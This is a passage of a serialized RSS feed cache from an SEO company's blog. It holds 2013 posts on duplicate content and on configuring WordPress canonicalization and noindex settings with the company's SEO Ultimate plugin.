href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=6Extr3JuGnY:CUS5F2KHUCk:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/6Extr3JuGnY\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:325:\"You&#8217;ve heard of duplicate content, but how do you know if you are creating it or how to stop it from penalizing your website? If you have a WordPress site, then it&#8217;s a simple fix, but for the sake of elaboration, let&#8217;s delve deeper into how search engines work and reveal what duplicate content really [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"1\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:102:\"http://www.seodesignsolutions.com/blog/seo-resources/duplicate-content-what-is-it-and-how-to-avoid-it/\";}s:7:\"summary\";s:325:\"You&#8217;ve heard of duplicate content, but how do you know if you are creating it or how to stop it from penalizing your website? If you have a WordPress site, then it&#8217;s a simple fix, but for the sake of elaboration, let&#8217;s delve deeper into how search engines work and reveal what duplicate content really [...]\";s:12:\"atom_content\";s:2822:\"<p>You&#8217;ve heard of duplicate content, but how do you know <strong>if you are creating it</strong> or <strong>how to stop it</strong> from penalizing your website? If you have a WordPress site, then <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/wordpress-seo-tips-to-avoid-search-engine-penalties/\">it&#8217;s a simple fix</a>, but for the sake of elaboration, let&#8217;s delve deeper into <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-natural-language-discrimination-through-semantic-analysis/\">how search engines work </a>and reveal what duplicate content really is.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\"><img class=\"aligncenter\" alt=\"\" src=\"http://www.seodesignsolutions.com/images/uniqueness.jpg\" width=\"425\" height=\"282\" /></a></p>\n<p>Block segment analysis dictates the value of weight / ranking  factors a web page is given for a set portion of the page. For example, text in the header and footer of a document are treated differently than the text in the body section of a page.</p>\n<p>The header is given more weight than the footer and typically the body text is given more value than both (since that is where the page has the ability to distinguish itself from borrowed elements, i.e. navigation, etc.).</p>\n<p>The reason for this is simple, page composition dictates that proximity and distinction (the more unique one document is from another) by distinguishing your content, the better. Search engines can easily discern duplication (through <a href=\"http://www.seodesignsolutions.com/blog/web-resources/semantic-optimization-keywords-and-co-occurrence-revisited/\">shingle analysis</a>, singular value decomposition (<a href=\"http://en.wikipedia.org/wiki/Singular_value_decomposition\">SVD</a>), etc.) in areas such as <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/google-website-analysis-live-site-review/\">navigation, sidebars</a>/blogrolls with the same links and footers all using the same text. This has the tendency of diffuse a pages ranking potential.</p>\n<p>Click Here to Read the Complete Post &#8211; &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\">Block Segmentation, Duplicate Content, SEO and IR</a>&#8221; or simply click the image above. As always, comments are welcomed and encouraged!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=6Extr3JuGnY:CUS5F2KHUCk:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/6Extr3JuGnY\" height=\"1\" width=\"1\"/>\";}i:6;a:12:{s:5:\"title\";s:43:\"Is Your SEO Strategy Proactive or Reactive?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/emH46l-JJSc/\";s:8:\"category\";s:10:\"Mini-Blogs\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 22 Feb 2013 20:00:39 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9236\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2089:\"<p>Before you jump in to any  <a href=\"http://www.seodesignsolutions.com/blog/seo-services/10-seo-techniques-for-top-10-rankings/\">SEO technique</a>, you&#8217;ll need to understand two things (1) it&#8217;s immediate and extended purpose and (2) it&#8217;s history. Like everything, there are cycles, and if you come on too strong at the wrong time (i.e. hit the turbo button when you should have taken a deferred and metered pace), then the outcome is almost predicable &#8211; you hit a wall.</p>\n<div class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-the-cycles-of-optimization/\"><img alt=\"\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/02/optimization-phases.jpg\" width=\"400\" height=\"265\" /></a><p class=\"wp-caption-text\">Ready, Fire, Aim!</p></div>\n<p>Do yourself a favor and its time to go back before you move forward. Here is a<strong> post from the past</strong> written over 4 years ago, that still rings true today. Aside from the fact that the turtle with a jet pack is just plain snazzy, there are some worthwhile gems to extract.</p>\n<p>Topics covered:</p>\n<ul>\n<li><strong>The Ping Phase</strong></li>\n<li><strong>The Gap</strong></li>\n<li><strong>Link Insurance</strong></li>\n<li><strong>The Authority Ranking and more&#8230;<br />\n</strong></li>\n</ul>\n<p>Click Here to read &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-the-cycles-of-optimization/\">SEO and the Cycles of Optimization</a>&#8220;&#8230; After you&#8217;ve read it, let me know what you think.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=emH46l-JJSc:V_gNdqREvtk:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/emH46l-JJSc\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:332:\"Before you jump in to any  SEO technique, you&#8217;ll need to understand two things (1) it&#8217;s immediate and extended purpose and (2) it&#8217;s history. Like everything, there are cycles, and if you come on too strong at the wrong time (i.e. hit the turbo button when you should have taken a deferred and metered pace), [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"1\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:93:\"http://www.seodesignsolutions.com/blog/mini-blogs/is-your-seo-strategy-proactive-or-reactive/\";}s:7:\"summary\";s:332:\"Before you jump in to any  SEO technique, you&#8217;ll need to understand two things (1) it&#8217;s immediate and extended purpose and (2) it&#8217;s history. Like everything, there are cycles, and if you come on too strong at the wrong time (i.e. hit the turbo button when you should have taken a deferred and metered pace), [...]\";s:12:\"atom_content\";s:2089:\"<p>Before you jump in to any  <a href=\"http://www.seodesignsolutions.com/blog/seo-services/10-seo-techniques-for-top-10-rankings/\">SEO technique</a>, you&#8217;ll need to understand two things (1) it&#8217;s immediate and extended purpose and (2) it&#8217;s history. Like everything, there are cycles, and if you come on too strong at the wrong time (i.e. hit the turbo button when you should have taken a deferred and metered pace), then the outcome is almost predicable &#8211; you hit a wall.</p>\n<div class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-the-cycles-of-optimization/\"><img alt=\"\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/02/optimization-phases.jpg\" width=\"400\" height=\"265\" /></a><p class=\"wp-caption-text\">Ready, Fire, Aim!</p></div>\n<p>Do yourself a favor and its time to go back before you move forward. Here is a<strong> post from the past</strong> written over 4 years ago, that still rings true today. Aside from the fact that the turtle with a jet pack is just plain snazzy, there are some worthwhile gems to extract.</p>\n<p>Topics covered:</p>\n<ul>\n<li><strong>The Ping Phase</strong></li>\n<li><strong>The Gap</strong></li>\n<li><strong>Link Insurance</strong></li>\n<li><strong>The Authority Ranking and more&#8230;<br />\n</strong></li>\n</ul>\n<p>Click Here to read &#8220;<a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-the-cycles-of-optimization/\">SEO and the Cycles of Optimization</a>&#8220;&#8230; After you&#8217;ve read it, let me know what you think.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=emH46l-JJSc:V_gNdqREvtk:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/emH46l-JJSc\" height=\"1\" width=\"1\"/>\";}i:7;a:12:{s:5:\"title\";s:51:\"WordPress SEO Tips to Avoid Search Engine Penalties\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/-oVM60xjqBo/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Tue, 19 Feb 2013 21:46:06 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9219\";s:7:\"content\";a:1:{s:7:\"encoded\";s:12603:\"<p>It’s no secret that WordPress is one of the most popular, easy-to-implement content management systems online. But just because it’s easy doesn’t mean that the <strong>out-of-the-box WordPress settings</strong> are ideal for optimal on page SEO. In fact, there&#8217;s nothing farther from the truth.</p>\n<div id=\"attachment_9220\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/wordpress-seo-tips-to-avoid-search-engine-penalties/\"><img class=\"size-full wp-image-9220\" alt=\"SEO Ultimate Indexing Tips\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/spiders.jpg\" width=\"400\" height=\"225\" /></a><p class=\"wp-caption-text\">How to Block Bots for Optimal SEO</p></div>\n<p>In this post, we cover simple solutions to prevent redundant pages (pages with duplicate or minimal content) from getting indexed from the roving tarsus of search engine spiders.</p>\n<p>Search engines use a <a href=\"http://en.wikipedia.org/wiki/Bag-of-words_model\">bag of words model</a> to deduce market-focus (<em>what each page is about</em>) and topicality and relevancy are often lost when boilerplate templates, category pages, tags or archives pages are left wide-open for spiders to crawl.</p>\n<p>By eliminating digital stragglers (thin pages), you’ll bolster your websites relevancy by having a higher percentage of <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\">unique indexed content</a>.</p>\n<p><span id=\"more-9219\"></span></p>\n<p>While users might observe a tag page, a search engine is programmed to view that page as <b>redundant content</b> with very few classifiers to distinguish itself from the boilerplate template.</p>\n<p>In fact, this is one of the prime directives of the Google Panda algorithm<i> (to eliminate low quality content through normalization within a body of documents</i>) hence, pages like these often get ignored or suppressed.</p>\n<h3>Avoid Rookie SEO Blunders</h3>\n<p>Websites with a high percentage of duplicate or minimal content on pages (such as category, archives or tag pages) can trigger algorithmic suppression.</p>\n<p>If your an avid SEO and understand HTML then you could simply implement a meta-robots command such as <a href=\"http://www.seodesignsolutions.com/blog/seo/duplicate-content-and-seo/\">nofollow or noindex</a>, but unless you want to do that painstakingly page by page, you’ll need a plugin such as <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> (<strong>The Premiere All-In-One WordPress SEO Plugin</strong>) from <a href=\"http://www.seodesignsolutions.com/\">SEO Design Solutions</a> that allows you to quickly and easily implement control over robots (search engine spiders) and canonicalization on the fly.</p>\n<p>If you are already using SEO Ultimate, chances are you have already implemented these changes. If not, then let’s get started by making your website canonical and segmenting any potential duplicate content penalties. This is particularly important to new websites so they can make a great first impression (by preventing non-canonical taxonomies or duplicate content from being indexed).</p>\n<p>With Google constantly updating their algorithms (Penguin, Panda and the other zoo animals running amuck) you&#8217;ll need to avoid tripping any algorithmic filters. Sharing content across multiple pages or thin content on boilerplate templates can devalue the integrity of your website architecture and spring these booby traps into action.</p>\n<p>A splintering effect occurs dynamically by default when using WordPress. For example, when you create a post, that post also gets added to a category archive and if you use tags, then each tag also becomes a page with a link “via the excerpt” to the original post.</p>\n<p>While implementing canonicalization helps, selective indexation via the <strong>Meta Robot Editor</strong> module is an ideal countermeasure to prevent multiple pages from being indexed and potentially creating penalties. Keep in mind, if its not indexed, there is no penalty (which is the basis of the Meta Robot Editor).</p>\n<div id=\"attachment_9221\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><img class=\"size-full wp-image-9221\" alt=\"Example of Category Archive Page with Cyclical Posts Under Category\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/category-archive.jpg\" width=\"500\" height=\"253\" /><p class=\"wp-caption-text\">Example of Category Archive Page with Cyclical Posts Under Category</p></div>\n<p>From an end-user&#8217;s perspective, tag pages are not ideal landing pages, which is why canonicalization is important. You want the search engines to show them the original page or post (not some tag or category archive).</p>\n<p>Search engines have been known to suppress websites which allow tag pages and category archives to leach through into their index by relegating them to the <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-to-increase-indexation/\">supplemental results</a>.</p>\n<p><img class=\"aligncenter size-full wp-image-9225\" alt=\"Example of Cyclical Posts\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/cyclical-posts.jpg\" width=\"500\" height=\"252\" /></p>\n<h3>Taming the Search Engine Spiders</h3>\n<p>First proceed to the SEO Ultimate module manager and make sure the <b>Canonicalizer</b>, <b>Meta Robot Tags Editor</b> module, <b>Miscellaneous </b>module and <b>Nofollow Manager</b> module are all enabled &gt;&gt;&gt; then click the <strong>save change</strong>s button.</p>\n<p style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-9222\" style=\"border: 1px solid black;\" alt=\"SEO Ultimate Module Manager\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/module-manager-seo-ultimate.jpg\" width=\"500\" height=\"898\" /></p>\n<p>If you are wondering about what <a href=\"http://support.google.com/webmasters/bin/answer.py?hl=en&amp;answer=139066\">canonicalization</a> is or why it matters, here&#8217;s a brief synopsis in layman&#8217;s terms.</p>\n<p><b>What it does:</b> Canonicalizer will point Google to the correct URL for your homepage and each of your posts, Pages, categories, tags, date archives, and author archives.</p>\n<p><b>Why it helps:</b> If Google comes across an alternate URL by which one of those items can be accessed, it will be able to find the correct URL and won’t penalize you for having two identical pages on your site.</p>\n<p><img class=\"aligncenter\" alt=\"SEO Ultimate Canonicalizer Module\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/canonicalizer.jpg\" width=\"500\" height=\"160\" /></p>\n<p>Next, click the <strong>Canonicalizer Module</strong> and under the <b>Canonical URL Generation</b> setting tick the first two boxes:</p>\n<ul>\n<li>Generate <code>&lt;link rel=”canonical”/&gt;</code> meta tags and</li>\n<li>Send <code>rel=”canonical”</code> HTTP headers</li>\n</ul>\n<p>This will ensure that any potential splintering of pages or posts are redirected to the primary page (helping Google avoid any potential confusion about your website architecture or data hierarchy).</p>\n<p>Also, make sure you tick the <b>redirect requests for nonexistent pagination checkbox</b> to add an automated 301 redirect for categories or archives that have recently changed due to adding or deleting content within the category or archive.</p>\n<p><b>Please Note:</b> Canonicalizer improves on two WordPress features to minimize possible exact-content duplication penalties. The <code>&lt;link rel=\"canonical\" /&gt;</code> tags setting improves on the canonical tags feature of WordPress 2.9 and above by encompassing much more of your site than just your posts and Pages.</p>\n<p>The nonexistent pagination redirect feature fills a gap in WordPress’s built-in canonicalization functionality: for example, if a URL request is made for page 6 of a category archive, and that category doesn’t have a page 6, then by default, depending on the context, WordPress will display a blank page, or it will display the content of the closest page number available, without issuing a 404 error or a 301 redirect (thus creating two or more identical webpages).</p>\n<p>This duplicate-content situation can happen when you, for example, remove many posts from a category, thus reducing the amount of pagination needed in the category’s archive. The Canonicalizer’s feature fixes that behavior by issuing 301 redirects to page 1 of the paginated section in question.</p>\n<h3>Implementing the Nofollow and Meta Robot Tags Editor</h3>\n<p>Since you are already in the <strong>Miscellaneous Module</strong> scroll down until you see the <b>Nofollow Manager</b> module&gt;&gt;&gt; <b>Click All the Boxes</b> and <b>save changes</b> and your done with this step.</p>\n<p><img class=\"aligncenter size-full wp-image-9224\" alt=\"The SEO Ultimate Nofollow Manager\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/Nofollow-Manager.jpg\" width=\"500\" height=\"345\" /></p>\n<h3>What is the Nofollow Manager?</h3>\n<p>The <strong>“Nofollow Manager”</strong> module lets you set the nofollow attribute on entire swaths of links on your site. Although Google has deprecated the use of nofollow for PageRank Sculpting in 2008, if you’re transitioning from another SEO plugin to SEO Ultimate, Nofollow Manager can help you maintain your existing settings if you’d rather take an <strong>“if it ain’t broke don’t fix it”</strong> approach.</p>\n<p>Regardless of whether or not you elect to use the <strong>Nofollow Manager</strong> module as an on page SEO tactic, you can implement the <strong>Meta Robot Tags Editor</strong> as a catch-all solution.</p>\n<div id=\"attachment_9226\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><img class=\"size-full wp-image-9226\" alt=\"Control default settings, pages, posts, media or term archives with the Meta Robot Tags Editor\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/SEO-Ultimate-Meta-Robot-Tags-Editor.jpg\" width=\"500\" height=\"331\" /><p class=\"wp-caption-text\">Control default settings, pages, posts, media or term archives with the Meta Robot Tags Editor</p></div>\n<p>Once complete simply save your changes and that will discourage bots from crawling the directories, pages, posts, categories, etc. listed above.</p>\n<p>To take it a step further, you have the ability to granularly assign index or noindex or nofollow status to pages, posts, media, tags and post format archives (through either using the default settings or individually). Once default values are assigned, they will carry through to the other sections e.g. categories, tags, etc. unless you specify and overwrite the option by visiting the tabs specific to each type.</p>\n<p>For a more detailed explaination of all the SEO Ultimate modules feel free to <a href=\"http://www.seodesignsolutions.com/wordpress-seo/\">watch the video</a>  here.</p>\n<p>In closing, there is one more thing we suggest in the Settings&gt;&gt;&gt;Permalinks&gt;&gt;&gt; and changing from the default parameter to custom and using <code>/%category%/%postname%/</code> to create <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-url-structure/\">keyword-rich URL structure</a> instead of the default URL output. This will give you more bang for your buck by creating keyword rich URL structures instead of the default P=ID# setting that WordPress generates by default.</p>\n<p>Later in the week, we’ll discuss how to use the <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-6-6/\">SEO Ultimate Siloed Categories Widget</a> in tandem with the Deeplink Juggernaut Module to quickly implement <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\">website silo architecture</a> quickly and easily on your blog.</p>\n<p>Make sure to check back for more SEO tips and tactics to d<a>istinguish your website in Search Engines </a>from the <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions Blog</a>.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=-oVM60xjqBo:c-KbzmXVYjg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/-oVM60xjqBo\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:369:\"It’s no secret that WordPress is one of the most popular, easy-to-implement content management systems online. But just because it’s easy doesn’t mean that the out-of-the-box WordPress settings are ideal for optimal on page SEO. In fact, there&#8217;s nothing farther from the truth. In this post, we cover simple solutions to prevent redundant pages (pages [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"7\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:105:\"http://www.seodesignsolutions.com/blog/wordpress-seo/wordpress-seo-tips-to-avoid-search-engine-penalties/\";}s:7:\"summary\";s:369:\"It’s no secret that WordPress is one of the most popular, easy-to-implement content management systems online. But just because it’s easy doesn’t mean that the out-of-the-box WordPress settings are ideal for optimal on page SEO. In fact, there&#8217;s nothing farther from the truth. In this post, we cover simple solutions to prevent redundant pages (pages [...]\";s:12:\"atom_content\";s:12603:\"<p>It’s no secret that WordPress is one of the most popular, easy-to-implement content management systems online. But just because it’s easy doesn’t mean that the <strong>out-of-the-box WordPress settings</strong> are ideal for optimal on page SEO. In fact, there&#8217;s nothing farther from the truth.</p>\n<div id=\"attachment_9220\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/wordpress-seo-tips-to-avoid-search-engine-penalties/\"><img class=\"size-full wp-image-9220\" alt=\"SEO Ultimate Indexing Tips\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/spiders.jpg\" width=\"400\" height=\"225\" /></a><p class=\"wp-caption-text\">How to Block Bots for Optimal SEO</p></div>\n<p>In this post, we cover simple solutions to prevent redundant pages (pages with duplicate or minimal content) from getting indexed from the roving tarsus of search engine spiders.</p>\n<p>Search engines use a <a href=\"http://en.wikipedia.org/wiki/Bag-of-words_model\">bag of words model</a> to deduce market-focus (<em>what each page is about</em>) and topicality and relevancy are often lost when boilerplate templates, category pages, tags or archives pages are left wide-open for spiders to crawl.</p>\n<p>By eliminating digital stragglers (thin pages), you’ll bolster your websites relevancy by having a higher percentage of <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\">unique indexed content</a>.</p>\n<p><span id=\"more-9219\"></span></p>\n<p>While users might observe a tag page, a search engine is programmed to view that page as <b>redundant content</b> with very few classifiers to distinguish itself from the boilerplate template.</p>\n<p>In fact, this is one of the prime directives of the Google Panda algorithm<i> (to eliminate low quality content through normalization within a body of documents</i>) hence, pages like these often get ignored or suppressed.</p>\n<h3>Avoid Rookie SEO Blunders</h3>\n<p>Websites with a high percentage of duplicate or minimal content on pages (such as category, archives or tag pages) can trigger algorithmic suppression.</p>\n<p>If your an avid SEO and understand HTML then you could simply implement a meta-robots command such as <a href=\"http://www.seodesignsolutions.com/blog/seo/duplicate-content-and-seo/\">nofollow or noindex</a>, but unless you want to do that painstakingly page by page, you’ll need a plugin such as <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> (<strong>The Premiere All-In-One WordPress SEO Plugin</strong>) from <a href=\"http://www.seodesignsolutions.com/\">SEO Design Solutions</a> that allows you to quickly and easily implement control over robots (search engine spiders) and canonicalization on the fly.</p>\n<p>If you are already using SEO Ultimate, chances are you have already implemented these changes. If not, then let’s get started by making your website canonical and segmenting any potential duplicate content penalties. This is particularly important to new websites so they can make a great first impression (by preventing non-canonical taxonomies or duplicate content from being indexed).</p>\n<p>With Google constantly updating their algorithms (Penguin, Panda and the other zoo animals running amuck) you&#8217;ll need to avoid tripping any algorithmic filters. Sharing content across multiple pages or thin content on boilerplate templates can devalue the integrity of your website architecture and spring these booby traps into action.</p>\n<p>A splintering effect occurs dynamically by default when using WordPress. For example, when you create a post, that post also gets added to a category archive and if you use tags, then each tag also becomes a page with a link “via the excerpt” to the original post.</p>\n<p>While implementing canonicalization helps, selective indexation via the <strong>Meta Robot Editor</strong> module is an ideal countermeasure to prevent multiple pages from being indexed and potentially creating penalties. Keep in mind, if its not indexed, there is no penalty (which is the basis of the Meta Robot Editor).</p>\n<div id=\"attachment_9221\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><img class=\"size-full wp-image-9221\" alt=\"Example of Category Archive Page with Cyclical Posts Under Category\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/category-archive.jpg\" width=\"500\" height=\"253\" /><p class=\"wp-caption-text\">Example of Category Archive Page with Cyclical Posts Under Category</p></div>\n<p>From an end-user&#8217;s perspective, tag pages are not ideal landing pages, which is why canonicalization is important. You want the search engines to show them the original page or post (not some tag or category archive).</p>\n<p>Search engines have been known to suppress websites which allow tag pages and category archives to leach through into their index by relegating them to the <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-tips-to-increase-indexation/\">supplemental results</a>.</p>\n<p><img class=\"aligncenter size-full wp-image-9225\" alt=\"Example of Cyclical Posts\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/cyclical-posts.jpg\" width=\"500\" height=\"252\" /></p>\n<h3>Taming the Search Engine Spiders</h3>\n<p>First proceed to the SEO Ultimate module manager and make sure the <b>Canonicalizer</b>, <b>Meta Robot Tags Editor</b> module, <b>Miscellaneous </b>module and <b>Nofollow Manager</b> module are all enabled &gt;&gt;&gt; then click the <strong>save change</strong>s button.</p>\n<p style=\"text-align: center;\"><img class=\"aligncenter size-full wp-image-9222\" style=\"border: 1px solid black;\" alt=\"SEO Ultimate Module Manager\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/module-manager-seo-ultimate.jpg\" width=\"500\" height=\"898\" /></p>\n<p>If you are wondering about what <a href=\"http://support.google.com/webmasters/bin/answer.py?hl=en&amp;answer=139066\">canonicalization</a> is or why it matters, here&#8217;s a brief synopsis in layman&#8217;s terms.</p>\n<p><b>What it does:</b> Canonicalizer will point Google to the correct URL for your homepage and each of your posts, Pages, categories, tags, date archives, and author archives.</p>\n<p><b>Why it helps:</b> If Google comes across an alternate URL by which one of those items can be accessed, it will be able to find the correct URL and won’t penalize you for having two identical pages on your site.</p>\n<p><img class=\"aligncenter\" alt=\"SEO Ultimate Canonicalizer Module\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/canonicalizer.jpg\" width=\"500\" height=\"160\" /></p>\n<p>Next, click the <strong>Canonicalizer Module</strong> and under the <b>Canonical URL Generation</b> setting tick the first two boxes:</p>\n<ul>\n<li>Generate <code>&lt;link rel=”canonical”/&gt;</code> meta tags and</li>\n<li>Send <code>rel=”canonical”</code> HTTP headers</li>\n</ul>\n<p>This will ensure that any potential splintering of pages or posts are redirected to the primary page (helping Google avoid any potential confusion about your website architecture or data hierarchy).</p>\n<p>Also, make sure you tick the <b>redirect requests for nonexistent pagination checkbox</b> to add an automated 301 redirect for categories or archives that have recently changed due to adding or deleting content within the category or archive.</p>\n<p><b>Please Note:</b> Canonicalizer improves on two WordPress features to minimize possible exact-content duplication penalties. The <code>&lt;link rel=\"canonical\" /&gt;</code> tags setting improves on the canonical tags feature of WordPress 2.9 and above by encompassing much more of your site than just your posts and Pages.</p>\n<p>The nonexistent pagination redirect feature fills a gap in WordPress’s built-in canonicalization functionality: for example, if a URL request is made for page 6 of a category archive, and that category doesn’t have a page 6, then by default, depending on the context, WordPress will display a blank page, or it will display the content of the closest page number available, without issuing a 404 error or a 301 redirect (thus creating two or more identical webpages).</p>\n<p>This duplicate-content situation can happen when you, for example, remove many posts from a category, thus reducing the amount of pagination needed in the category’s archive. The Canonicalizer’s feature fixes that behavior by issuing 301 redirects to page 1 of the paginated section in question.</p>\n<h3>Implementing the Nofollow and Meta Robot Tags Editor</h3>\n<p>Since you are already in the <strong>Miscellaneous Module</strong> scroll down until you see the <b>Nofollow Manager</b> module&gt;&gt;&gt; <b>Click All the Boxes</b> and <b>save changes</b> and your done with this step.</p>\n<p><img class=\"aligncenter size-full wp-image-9224\" alt=\"The SEO Ultimate Nofollow Manager\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/Nofollow-Manager.jpg\" width=\"500\" height=\"345\" /></p>\n<h3>What is the Nofollow Manager?</h3>\n<p>The <strong>“Nofollow Manager”</strong> module lets you set the nofollow attribute on entire swaths of links on your site. Although Google has deprecated the use of nofollow for PageRank Sculpting in 2008, if you’re transitioning from another SEO plugin to SEO Ultimate, Nofollow Manager can help you maintain your existing settings if you’d rather take an <strong>“if it ain’t broke don’t fix it”</strong> approach.</p>\n<p>Regardless of whether or not you elect to use the <strong>Nofollow Manager</strong> module as an on page SEO tactic, you can implement the <strong>Meta Robot Tags Editor</strong> as a catch-all solution.</p>\n<div id=\"attachment_9226\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><img class=\"size-full wp-image-9226\" alt=\"Control default settings, pages, posts, media or term archives with the Meta Robot Tags Editor\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/02/SEO-Ultimate-Meta-Robot-Tags-Editor.jpg\" width=\"500\" height=\"331\" /><p class=\"wp-caption-text\">Control default settings, pages, posts, media or term archives with the Meta Robot Tags Editor</p></div>\n<p>Once complete simply save your changes and that will discourage bots from crawling the directories, pages, posts, categories, etc. listed above.</p>\n<p>To take it a step further, you have the ability to granularly assign index or noindex or nofollow status to pages, posts, media, tags and post format archives (through either using the default settings or individually). Once default values are assigned, they will carry through to the other sections e.g. categories, tags, etc. unless you specify and overwrite the option by visiting the tabs specific to each type.</p>\n<p>For a more detailed explaination of all the SEO Ultimate modules feel free to <a href=\"http://www.seodesignsolutions.com/wordpress-seo/\">watch the video</a>  here.</p>\n<p>In closing, there is one more thing we suggest in the Settings&gt;&gt;&gt;Permalinks&gt;&gt;&gt; and changing from the default parameter to custom and using <code>/%category%/%postname%/</code> to create <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-url-structure/\">keyword-rich URL structure</a> instead of the default URL output. This will give you more bang for your buck by creating keyword rich URL structures instead of the default 